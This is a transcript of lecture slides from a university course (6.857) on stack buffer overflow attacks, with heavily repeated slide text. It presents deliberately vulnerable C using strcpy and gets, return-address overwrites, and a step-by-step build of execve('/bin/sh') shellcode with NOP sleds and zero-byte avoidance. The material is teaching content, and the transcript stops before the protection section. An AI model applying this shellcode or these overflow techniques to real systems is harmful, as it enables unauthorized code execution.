Buffer Overflow Attacks
description
Transcript of Buffer Overflow Attacks
Buffer Overflow Attacks
1
Basic Idea Sample Attacks Protection Basic Idea Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
History
2
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
1960s 1970s 1990s Today1980s
Vulnerability exploited on time-share machines
Attacks on early networkedmachines
Morris Worm usesbuffer overflow in
taking down significantportion of the Internet
Buffer overflow attacks become(arguably) the most pressing
security concerns facing the web(e..g., in 1998, 2/3 of CERT advisories
were buffer overflow related)
The problem persists(e.g., IE VML advisory from
two months ago).
Memory Layout
3
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addresses
Memory Layout
4
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
Memory Layout
5
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
Memory Layout
6
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp
Memory Layout
7
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp2
Memory Layout
8
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp2
1
Memory Layout
9
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp2
1
ret
Memory Layout
10
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp2
1
ret
sfp
Memory Layout
11
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp2
1
ret
sfp
Memory Layout
12
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp2
1
ret
sfp
Memory Layout
13
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp2
1
ret
sfp
buffer
Memory Layout
14
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10]; strcpy(buffer, bigstr);}
sp
fp2
1
ret
sfp
buffer
Memory Layout
15
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10]; strcpy(buffer, bigstr);}
sp
fp2
1
ret
sfp
bigstr
Sample Attacks
16
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
Modify local variables
Modify return address to skip/repeat code
Modify return address to run evil code
Modify Local Variables
17
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
Modify local variables
Modify return address to skip/repeat code
Modify return address to run evil code
Modify Local Variables
18
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
Modify Local Variables
19
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
ret
sfp
query
subject[]
recp[]
Modify Local Variables
20
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
ret
sfp
query
subject[]
recp[]
Modify Local Variables
21
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
ret
sfp
subject[]
recp[]
query
Modify Local Variables
22
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
ret
sfp
subject[]
recp[]
query
Demo…
Repeat Code…
23
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
Modify local variables
Modify return address to skip/repeat code
Modify return address to run evil code
Repeat Code…
24
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
b
a
ret
sfp
buffer
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
Repeat Code…
25
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
b
a
ret
sfp
buffer
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
Repeat Code…
26
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
b
a
ret
sfp
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
addr
Repeat Code…
27
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
b
a
ret
sfp
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
buffer
Repeat Code…
28
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
b
a
ret
sfp
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
addr
Repeat Code…
29
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
b
a
ret
sfp
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
addr
Demo…
Sample Attacks
30
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
Modify local variables
Modify return address to skip/repeat code
Modify return address to run evil code
Running Evil Code…
31
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
2
1
ret
sfp
buffer
void func(int a, int b) {char buffer[32];
gets(buffer); …}
void func(int a, int b) {char buffer[32];
gets(buffer); …}
Running Evil Code…
32
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
2
1
void func(int a, int b) {char buffer[32];
gets(buffer); …}
void func(int a, int b) {char buffer[32];
gets(buffer); …}
evil codeevil codeevil codeevil codenopnopnopnopnopnopnopnopnopnopnop0x80483eb
Running Evil Code…
33
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
2
1
void func(int a, int b) {char buffer[32];
gets(buffer); …}
void func(int a, int b) {char buffer[32];
gets(buffer); …}
evil codeevil codeevil codeevil codenopnopnopnopnopnopnopnopnopnopnop0x80483eb
Running Evil Code…
34
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
2
1
void func(int a, int b) {char buffer[32];
gets(buffer); …}
void func(int a, int b) {char buffer[32];
gets(buffer); …}
evil codeevil codeevil codeevil codenopnopnopnopnopnopnopnopnopnopnop0x80483eb
Running Evil Code…
35
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
2
1
void func(int a, int b) {char buffer[32];
gets(buffer); …}
void func(int a, int b) {char buffer[32];
gets(buffer); …}
evil codeevil codeevil codeevil codenopnopnopnopnopnopnopnopnopnopnop0x80483eb
Running Evil Code…
36
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
2
1
void func(int a, int b) {char buffer[32];
gets(buffer); …}
void func(int a, int b) {char buffer[32];
gets(buffer); …}
evil codeevil codeevil codeevil codenopnopnopnopnopnopnopnopnopnopnop0x80483eb
????
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
37
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
38
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
39
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
0xffffffff
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
40
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
0xffffffff
0x80884a80xfffffff8
“/bin/sh”
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
41
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
42
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
name
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
43
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
NULL
0xfffffff8
0x80884a8
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
44
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
NULL
0x80884a8
0xfffffff8
ret
sfpfp (ebp)
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
45
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
NULL
ret
sfpfp (ebp)
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
ebx0x80884a8
0xfffffff8
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
46
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
NULL
ret
sfpfp (ebp)
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
ebx
ecx0x80884a8
0xfffffff8
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
47
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
NULL
ret
sfpfp (ebp)
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
ebx
ecx
edx
0x80884a8
0xfffffff8
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
48
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
NULL
ret
sfpfp (ebp)
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
ebx
ecx
edx
0x80884a8
0xfffffff8
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
49
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
NULL
ret
sfpfp (ebp)
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
ebx
ecx
edx
0x80884a8
0xfffffff8
Running Evil Code…
50
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfpfp (ebp)
movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80
movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80
Running Evil Code…
51
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfpfp (ebp)
movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80
movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80
string_addr
NULLecxebx
edx
0x8
Running Evil Code…
52
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80
movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80
string_addr
NULL
??????
Running Evil Code…
53
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Running Evil Code…
54
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
“bin/sh”
code
Running Evil Code…
55
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
“bin/sh”
code
Running Evil Code…
56
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
“bin/sh”
code
addr of “bin/sh”
Running Evil Code…
57
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
“bin/sh”
code
addr of “bin/sh” esi
Running Evil Code…
58
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
“bin/sh”
code
Running Evil Code…
59
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #1: Zero Bytes
Running Evil Code…
60
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #1: Zero BytesSolution: Generate on the fly(e.g., push $0x0 = xor %eax, %eax push %eax)
Running Evil Code…
61
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #2: Guessing the Return Address
code
ret’ret’ret’ret’ret’ret’
Running Evil Code…
62
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Obstacle #2: Guessing the Return Address
code
ret’ret’ret’ret’ret’ret’
Running Evil Code…
63
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
ret
sfp
